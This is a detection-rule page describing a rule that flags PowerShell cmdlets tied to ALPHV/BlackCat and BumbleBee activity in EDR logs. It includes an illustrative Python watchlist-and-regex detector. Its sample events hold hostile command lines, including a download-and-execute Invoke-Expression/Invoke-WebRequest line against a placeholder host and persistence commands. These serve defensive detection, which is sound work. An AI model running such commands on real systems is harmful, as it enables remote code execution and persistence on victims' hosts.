Known Malicious PowerShell Cmdlet

Anvilogic Forge

Summary
This detection rule identifies the execution of PowerShell cmdlets associated with known malicious activity and threat actors, specifically cmdlets linked to groups such as ALPHV/BlackCat and BumbleBee. The rule runs over CrowdStrike EDR log data, looking for executions of these cmdlets on Windows hosts within the last two hours. It uses a regular expression to match any of a wide array of cmdlets commonly abused in attacks, including those used for persistence mechanisms and credential dumping. The rule covers several atomic tests mapped to the MITRE ATT&CK framework, in particular the T1059.001 (PowerShell) execution technique. Detecting these cmdlets as soon as they are executed supports rapid incident response.
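The following is an added illustration of the detection pattern the summary describes (a cmdlet watchlist compiled into one regular expression, restricted to Windows process events from the last two hours); it is not Anvilogic's rule logic or query. The watchlist, the event field names, and the sample events are all assumptions constructed for the example; the rule's real cmdlet list and the CrowdStrike field names are not reproduced on this page.

```python
import re
from datetime import datetime, timedelta, timezone

# Illustrative watchlist (assumption): a handful of real PowerShell cmdlet names that are
# commonly abused. The rule's actual list is much larger and is not shown on the page.
WATCHLIST = [
    "New-ScheduledTask",       # persistence
    "Register-ScheduledTask",  # persistence
    "New-Service",             # persistence
    "Invoke-Expression",       # arbitrary code execution
    "Invoke-WebRequest",       # payload download
    "Start-BitsTransfer",      # payload download
]

# One alternation. The lookarounds stop "Invoke-WebRequest" matching inside a longer
# token such as "Invoke-WebRequestLogger". Cmdlet names are case-insensitive in PowerShell,
# so the regex is too.
CMDLET_RE = re.compile(
    r"(?<![\w-])(?:" + "|".join(re.escape(c) for c in WATCHLIST) + r")(?![\w-])",
    re.IGNORECASE,
)

LOOKBACK = timedelta(hours=2)  # the two-hour window from the summary


def match_cmdlets(command_line):
    """Return the distinct watchlisted cmdlets in a command line, lower-cased, in order of first hit."""
    seen = []
    for m in CMDLET_RE.finditer(command_line or ""):
        name = m.group(0).lower()
        if name not in seen:
            seen.append(name)
    return seen


def detect(events, now):
    """Apply the three filters (Windows, recent, watchlisted cmdlet) and return (hostname, hits) tuples.

    Event keys 'timestamp' (aware datetime), 'platform', 'hostname' and 'command_line'
    are assumed names, not the CrowdStrike schema.
    """
    alerts = []
    for ev in events:
        if ev["platform"] != "Windows":
            continue
        if now - ev["timestamp"] > LOOKBACK:
            continue
        hits = match_cmdlets(ev["command_line"])
        if hits:
            alerts.append((ev["hostname"], hits))
    return alerts


# Constructed sample events; not real telemetry.
NOW = datetime(2024, 2, 9, 12, 0, tzinfo=timezone.utc)
SAMPLE_EVENTS = [
    {"timestamp": NOW - timedelta(minutes=5), "platform": "Windows", "hostname": "WS01",
     "command_line": 'powershell.exe -c "Register-ScheduledTask -TaskName upd -Action $a"'},
    {"timestamp": NOW - timedelta(minutes=30), "platform": "Windows", "hostname": "WS02",
     "command_line": 'powershell.exe -c "Get-Process | Where-Object CPU -gt 100"'},
    {"timestamp": NOW - timedelta(hours=3), "platform": "Windows", "hostname": "WS03",   # outside window
     "command_line": 'powershell.exe -c "New-Service -Name svc -BinaryPathName $p"'},
    {"timestamp": NOW - timedelta(minutes=1), "platform": "Linux", "hostname": "SRV01",  # wrong platform
     "command_line": 'pwsh -c "Invoke-WebRequest https://example.invalid"'},
    {"timestamp": NOW - timedelta(minutes=10), "platform": "Windows", "hostname": "WS04",
     "command_line": "powershell.exe -c \"Invoke-Expression (Invoke-WebRequest 'http://example.invalid/x')\""},
]


if __name__ == "__main__":
    for host, hits in detect(SAMPLE_EVENTS, NOW):
        print(f"{host}: {', '.join(hits)}")
```

Running the block alerts on WS01 and WS04 only: WS03 falls outside the two-hour window and SRV01 is not a Windows host. A name-based regex is one signal rather than full coverage, since cmdlet aliases and obfuscated names do not match it; pairing it with parent-process and script-block telemetry is the usual way to close that gap.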
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
ATT&CK Techniques
  • T1059.001
  • T1059
Created: 2024-02-09